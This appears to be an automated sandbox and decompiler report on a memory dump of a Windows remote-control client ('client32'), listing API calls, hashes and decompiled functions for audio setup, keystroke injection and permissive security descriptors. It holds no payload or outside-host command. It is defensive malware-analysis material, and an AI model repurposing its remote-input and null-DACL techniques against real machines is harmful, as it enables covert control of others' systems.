Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
String ID: NSMClassList$NSMFindClassEvent
API String ID: 1622498684-2883797795
Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5

Uniqueness

Uniqueness Score: -1.00%

Function 11148360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74keyboardCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,1102EA98,?), ref: 1114837D
wsprintfA.USER32 ref: 1114839B
OutputDebugStringA.KERNEL32(?,?,1102EA98,?), ref: 111483B1

Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18

Part of subcall function 11148010: GetCurrentThreadId.KERNEL32 ref: 11148023
Part of subcall function 11148010: wsprintfA.USER32 ref: 111480A3
Part of subcall function 11148010: IsBadReadPtr.KERNEL32(?,00000001), ref: 111480C8
Part of subcall function 11148010: wsprintfA.USER32 ref: 111480E8
Part of subcall function 11148010: wsprintfA.USER32 ref: 11148105

OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F6
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F9

Part of subcall function 110B7F30: GetLastError.KERNEL32(1111025B,11195AD8,?,?,11029B81,?,11195AD8,1111025B,00000000), ref: 110B7F5C
Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F6B
Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F8D
Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FBD
Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FE8
Part of subcall function 110B7F30: GetMessageA.USER32 ref: 110B800C
Part of subcall function 110B7F30: TranslateMessage.USER32(?), ref: 110B8015
Part of subcall function 110B7F30: DispatchMessageA.USER32 ref: 110B801E

GetKeyState.USER32(00000011), ref: 11148419

Strings

Exception caught at %x. Trying minidump., xrefs: 11148395

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
String ID: Exception caught at %x. Trying minidump.
API String ID: 490122820-543155386
Opcode ID: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
Instruction ID: 29a59b4c4c914cd8c532226d15f5e4317bff798f4e19c00b73adffff4a71f3ad
Opcode Fuzzy Hash: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
Instruction Fuzzy Hash: 3121F875D002189BD715DBA4DDC0FD9F3B8EB1C709F0040A8EA1597A84DBB06E84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 11113387
GetTickCount.KERNEL32 ref: 111133A1

Strings

nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
..\ctl32\Remote.cpp, xrefs: 111133D4

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountIconicTick
String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
API String ID: 1307367305-2838568823
Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A

Uniqueness

Uniqueness Score: -1.00%

Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 110C10AD
ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
BringWindowToTop.USER32(000000FF), ref: 110C10C7
GetCurrentThreadId.KERNEL32 ref: 110C10E8

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringCurrentIconicShowThread
String ID:
API String ID: 4184413098-0
Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 110EE230 Relevance: 4.5, APIs: 3, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$AllocDaclInitializeLocal
String ID:
API String ID: 1946635556-0
Opcode ID: 6e59face588754e8aeec168d01ccd83def4bd6ed2e133d5a94f45f1223fcfbb6
Instruction ID: 48c328ce5276e0414f5d06d79fad6670dbdd187e0f7480751a5c204fdfa869f7
Opcode Fuzzy Hash: 6e59face588754e8aeec168d01ccd83def4bd6ed2e133d5a94f45f1223fcfbb6
Instruction Fuzzy Hash: ACF0127068031A9FE7148F64C9D9F80B7E8A716B08F144064F6259B2D4D6B1D4428B14

Uniqueness

Uniqueness Score: -1.00%

Function 1105A760 Relevance: 4.5, APIs: 3, Instructions: 19windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105ADFA,DuplicateHandle), ref: 1105A771
FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105ADFA,DuplicateHandle), ref: 1105A77F
LocalFree.KERNEL32(?,?,?,1105ADFA,DuplicateHandle), ref: 1105A789

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c6ec65f531cfde515abaa01a675cc8342fa0e358ec51e2099163275590dd74ed
Instruction ID: fe78a26210fd101f166c275b46dcf80d6e3257aca979198b374a34756ee526d8
Opcode Fuzzy Hash: c6ec65f531cfde515abaa01a675cc8342fa0e358ec51e2099163275590dd74ed
Instruction Fuzzy Hash: E7D05E756C430CBBF2189BD0CE4AFA9B7ACD70CB17F100254FB21975C49AB169008BB6

Uniqueness

Uniqueness Score: -1.00%

Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 111131E2
keybd_event.USER32 ref: 11113215

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevicekeybd_event
String ID:
API String ID: 1421710848-0
Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1100C530 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 185
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1100C530(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				char _v16;
				long _v20;
				void* __ecx;
				signed int _t51;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				struct HINSTANCE__* _t68;
				int _t71;
				void _t81;
				void* _t94;
				void _t101;
				signed int _t102;
				signed int _t103;
				void* _t107;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t112;

				_t80 = __ebx;
				_push(0xffffffff);
				_push(0x1117e2fc);
				_push( *[fs:0x0]);
				_push(_t81);
				_t51 =  *0x111ec774; // 0xcbc1010
				_push(_t51 ^ _t110);
				 *[fs:0x0] =  &_v16;
				_t101 = _t81;
				_t107 = E111101B0(__ebx, _t94, __eflags, 0x464);
				 *(_t101 + 4) = _t107;
				 *((intOrPtr*)(_t107 + 4)) = _a4;
				_t112 = _t111 + 4;
				_t7 = _t107 + 0x10; // 0x10
				 *_t107 = _t101;
				_t102 = InitializeCriticalSection;
				 *((intOrPtr*)(_t107 + 8)) = _a8;
				 *((intOrPtr*)(_t107 + 0xc)) = _a12;
				InitializeCriticalSection(_t7);
				_t10 = _t107 + 0x28; // 0x28
				InitializeCriticalSection(_t10);
				_t11 = _t107 + 0x40; // 0x40
				_t96 = _t11;
				InitializeCriticalSection(_t11);
				_t12 = _t107 + 0x58; // 0x58
				InitializeCriticalSection(_t12);
				_t58 = CreateEventA(0, 0, 0, 0);
				 *(_t107 + 0x88) = _t58;
				_t119 = _t58;
				if(_t58 == 0) {
					E11029A70("idata->hEvent", "..\\ctl32\\AUDIO.CPP", 0x15d);
					_t112 = _t112 + 0xc;
				}
				_t59 = E111101B0(_t80, _t96, _t119, 4);
				_a4 = _t59;
				_v8 = 0;
				_t120 = _t59;
				if(_t59 == 0) {
					_t60 = 0;
					__eflags = 0;
				} else {
					_t60 = E11110DE0(_t59, _t96, _t120, 1,  *(_t107 + 0x88));
				}
				_t103 = _t102 | 0xffffffff;
				_v8 = _t103;
				 *((intOrPtr*)(_t107 + 0x8c)) = _t60;
				_t61 = E111101B0(_t80, _t96, _t120, 4);
				_a4 = _t61;
				_v8 = 1;
				_t121 = _t61;
				if(_t61 == 0) {
					_t62 = 0;
					__eflags = 0;
				} else {
					_t96 =  *(_t107 + 0x88);
					_t62 = E11110DE0(_t61,  *(_t107 + 0x88), _t121, 1,  *(_t107 + 0x88));
				}
				_v8 = _t103;
				 *((intOrPtr*)(_t107 + 0x90)) = _t62;
				_t63 = E111101B0(_t80, _t96, _t121, 4);
				_a4 = _t63;
				_v8 = 2;
				_t122 = _t63;
				if(_t63 == 0) {
					_t64 = 0;
					__eflags = 0;
				} else {
					_t64 = E11110DE0(_t63, _t96, _t122, 1,  *(_t107 + 0x88));
				}
				_v8 = _t103;
				 *((intOrPtr*)(_t107 + 0x1e8)) = _t64;
				_t65 = E111101B0(_t80, _t96, _t122, 4);
				_a4 = _t65;
				_v8 = 3;
				_t123 = _t65;
				if(_t65 == 0) {
					_t66 = 0;
					__eflags = 0;
				} else {
					_t66 = E11110DE0(_t65,  *(_t107 + 0x88), _t123, 1,  *(_t107 + 0x88));
				}
				 *((intOrPtr*)(_t107 + 0x1ec)) = _t66;
				 *((intOrPtr*)(_t107 + 0x210)) = 0xfffffffe;
				 *(_t107 + 0x23c) = _t103;
				 *((char*)(_t107 + 0x239)) = GetVersion();
				_t68 = LoadLibraryA("msacm32.dll");
				 *(_t107 + 0x214) = _t68;
				if(_t68 != 0) {
					 *((intOrPtr*)(_t107 + 0x218)) = GetProcAddress(_t68, "acmStreamOpen");
					 *((intOrPtr*)(_t107 + 0x21c)) = GetProcAddress( *(_t107 + 0x214), "acmStreamClose");
					 *((intOrPtr*)(_t107 + 0x220)) = GetProcAddress( *(_t107 + 0x214), "acmStreamSize");
					 *((intOrPtr*)(_t107 + 0x224)) = GetProcAddress( *(_t107 + 0x214), "acmStreamPrepareHeader");
					 *((intOrPtr*)(_t107 + 0x228)) = GetProcAddress( *(_t107 + 0x214), "acmStreamConvert");
					 *((intOrPtr*)(_t107 + 0x22c)) = GetProcAddress( *(_t107 + 0x214), "acmStreamUnprepareHeader");
				}
				_t108 = CreateThread(0, 0x2000, E1100C0F0, _t107, 0,  &_v20);
				if(_t108 == 0) {
					E11029A70("hAudio", "..\\ctl32\\AUDIO.CPP", 0x174);
				}
				SetThreadPriority(_t108, 1);
				_t71 = CloseHandle(_t108);
				 *[fs:0x0] = _v16;
				return _t71;
			}

0x1100c530
0x1100c533
0x1100c535
0x1100c540
0x1100c541
0x1100c544
0x1100c54b
0x1100c54f
0x1100c555
0x1100c567
0x1100c56c
0x1100c56f
0x1100c572
0x1100c575
0x1100c578
0x1100c57a
0x1100c581
0x1100c584
0x1100c587
0x1100c589
0x1100c58d
0x1100c58f
0x1100c58f
0x1100c593
0x1100c595
0x1100c599
0x1100c5a3
0x1100c5a9
0x1100c5af
0x1100c5b1
0x1100c5c2
0x1100c5c7
0x1100c5c7
0x1100c5cc
0x1100c5d4
0x1100c5d7
0x1100c5de
0x1100c5e0
0x1100c5f4
0x1100c5f4
0x1100c5e2
0x1100c5ed
0x1100c5ed
0x1100c5f6
0x1100c5fb
0x1100c5fe
0x1100c604
0x1100c60c
0x1100c60f
0x1100c616
0x1100c618
0x1100c62c
0x1100c62c
0x1100c61a
0x1100c61a
0x1100c625
0x1100c625
0x1100c630
0x1100c633
0x1100c639
0x1100c641
0x1100c644
0x1100c64b
0x1100c64d
0x1100c661
0x1100c661
0x1100c64f
0x1100c65a
0x1100c65a
0x1100c665
0x1100c668
0x1100c66e
0x1100c676
0x1100c679
0x1100c680
0x1100c682
0x1100c696
0x1100c696
0x1100c684
0x1100c68f
0x1100c68f
0x1100c698
0x1100c69e
0x1100c6a8
0x1100c6b9
0x1100c6bf
0x1100c6c5
0x1100c6cd
0x1100c6dd
0x1100c6fd
0x1100c711
0x1100c719
0x1100c739
0x1100c741
0x1100c741
0x1100c760
0x1100c764
0x1100c775
0x1100c77a
0x1100c780
0x1100c787
0x1100c790
0x1100c79d

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

InitializeCriticalSection.KERNEL32(00000010), ref: 1100C587
InitializeCriticalSection.KERNEL32(00000028), ref: 1100C58D
InitializeCriticalSection.KERNEL32(00000040), ref: 1100C593
InitializeCriticalSection.KERNEL32(00000058), ref: 1100C599
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1100C5A3
GetVersion.KERNEL32 ref: 1100C6AE
LoadLibraryA.KERNEL32(msacm32.dll), ref: 1100C6BF
GetProcAddress.KERNEL32(00000000,acmStreamOpen), ref: 1100C6DB
GetProcAddress.KERNEL32(?,acmStreamClose), ref: 1100C6EF
GetProcAddress.KERNEL32(?,acmStreamSize), ref: 1100C703
GetProcAddress.KERNEL32(?,acmStreamPrepareHeader), ref: 1100C717
GetProcAddress.KERNEL32(?,acmStreamConvert), ref: 1100C72B
CreateThread.KERNEL32 ref: 1100C75A
GetProcAddress.KERNEL32(?,acmStreamUnprepareHeader), ref: 1100C73F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

SetThreadPriority.KERNEL32(00000000,00000001), ref: 1100C780
CloseHandle.KERNEL32(00000000), ref: 1100C787

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

Strings

msacm32.dll, xrefs: 1100C6B4
acmStreamUnprepareHeader, xrefs: 1100C733
idata->hEvent, xrefs: 1100C5BD
acmStreamConvert, xrefs: 1100C725
acmStreamOpen, xrefs: 1100C6D5
acmStreamSize, xrefs: 1100C6F7
acmStreamPrepareHeader, xrefs: 1100C70B
hAudio, xrefs: 1100C770
..\ctl32\AUDIO.CPP, xrefs: 1100C5B8, 1100C76B
acmStreamClose, xrefs: 1100C6E9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalInitializeSection$CreateExitProcessThreadwsprintf$CloseErrorEventHandleLastLibraryLoadMessagePriorityVersion_malloc_memset_strrchr
String ID: ..\ctl32\AUDIO.CPP$acmStreamClose$acmStreamConvert$acmStreamOpen$acmStreamPrepareHeader$acmStreamSize$acmStreamUnprepareHeader$hAudio$idata->hEvent$msacm32.dll
API String ID: 164558982-2117072583
Opcode ID: cfefa6cb48f10cb449d761e04fb00ecc249e30a8e65a1387da47812114e30642
Instruction ID: 049fab11b20bb768323fb1b34283fa62b23a8e76d4d9a3094b6e7a7a4f077f96
Opcode Fuzzy Hash: cfefa6cb48f10cb449d761e04fb00ecc249e30a8e65a1387da47812114e30642
Instruction Fuzzy Hash: FD61AEB5A40709ABEB20DFB5CD45BDAFBE4AF54304F00492EE96AD7280EB74B500CB50

Uniqueness

Uniqueness Score: -1.00%

Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E11005410(void* __ecx, void* __eflags) {
				signed int _v8;
				char _v40;
				signed char _v41;
				signed char _v42;
				signed char _v43;
				signed char _v44;
				signed char _v45;
				signed char _v46;
				signed char _v47;
				signed char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void _v68;
				void** _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t70;
				void* _t107;
				void* _t109;
				void* _t115;
				void* _t119;
				void* _t128;
				void* _t129;
				intOrPtr* _t149;
				CHAR* _t180;
				void* _t181;
				void* _t182;
				signed int _t183;

				_t187 = __eflags;
				_t70 =  *0x111ec774; // 0xcbc1010
				_v8 = _t70 ^ _t183;
				_t182 = __ecx;
				E1105E950( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)) + 0x34)), __eflags, "Annotate", "Tool",  *((intOrPtr*)(__ecx + 0x134)), 2);
				E1105E950( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)) + 0x34)), _t187, "Annotate", "PenColour",  *((intOrPtr*)(__ecx + 0x120)), 2);
				E1105E950( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)) + 0x34)), _t187, "Annotate", "PenStyle",  *((intOrPtr*)(__ecx + 0x118)), 2);
